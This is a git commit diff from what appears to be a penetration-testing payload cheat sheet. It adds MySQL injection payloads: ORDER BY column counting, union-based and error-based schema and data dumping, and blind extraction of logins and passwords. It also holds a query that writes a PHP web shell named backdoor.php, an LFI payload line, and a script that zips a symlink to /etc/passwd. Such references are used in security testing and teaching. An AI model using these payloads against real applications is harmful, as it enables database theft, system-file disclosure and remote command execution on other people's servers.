Symbolic Link Zip + SQL injection ORDER BY
parent
a1fbd41bbb
commit
6070ece522
|
@ -51,4 +51,5 @@ http://example.com/index.php?page=data:application/x-httpd-php;base64,PHN2ZyBvbm
|
|||
```
|
||||
|
||||
## Thanks to
|
||||
* https://www.owasp.org/index.php/Testing_for_Local_File_Inclusion
|
||||
* [OWASP LFI](https://www.owasp.org/index.php/Testing_for_Local_File_Inclusion)
|
||||
* [HighOn.coffee LFI Cheat](https://highon.coffee/blog/lfi-cheat-sheet/)
|
||||
|
|
|
@ -1,5 +1,15 @@
|
|||
# MYSQL Injection
|
||||
|
||||
##Detect columns number
|
||||
Using a simple ORDER
|
||||
```
|
||||
order by 1
|
||||
order by 2
|
||||
order by 3
|
||||
...
|
||||
order by XXX
|
||||
```
|
||||
|
||||
##MySQL Union Based
|
||||
```
|
||||
UniOn Select 1,2,3,4,...,gRoUp_cOncaT(0x7c,schema_name,0x7c)+fRoM+information_schema.schemata
|
||||
|
@ -24,7 +34,7 @@ AND updatexml(rand(),concat(0x3a,(SELECT concat(CHAR(126),data_info,CHAR(126)) F
|
|||
```
|
||||
|
||||
##MYSQL Error Based - Extractvalue function
|
||||
```
|
||||
```
|
||||
AND extractvalue(rand(),concat(CHAR(126),version(),CHAR(126)))--
|
||||
AND extractvalue(rand(),concat(0x3a,(SELECT concat(CHAR(126),schema_name,CHAR(126)) FROM information_schema.schemata LIMIT data_offset,1)))--
|
||||
AND extractvalue(rand(),concat(0x3a,(SELECT concat(CHAR(126),TABLE_NAME,CHAR(126)) FROM information_schema.TABLES WHERE table_schema=data_column LIMIT data_offset,1)))--
|
||||
|
@ -61,4 +71,4 @@ AND MAKE_SET(YOLO<ascii(substring(concat(login,password),POS,1)),1)
|
|||
##MYSQL DROP SHELL
|
||||
```
|
||||
SELECT "<?php system($_GET['cmd']); ?>" into outfile "C:\\xampp\\htdocs\\backdoor.php"
|
||||
```
|
||||
```
|
||||
|
|
Binary file not shown.
|
@ -0,0 +1,2 @@
|
|||
ln -s /etc/passwd link
|
||||
zip --symlinks test.zip link
|
Loading…
Reference in New Issue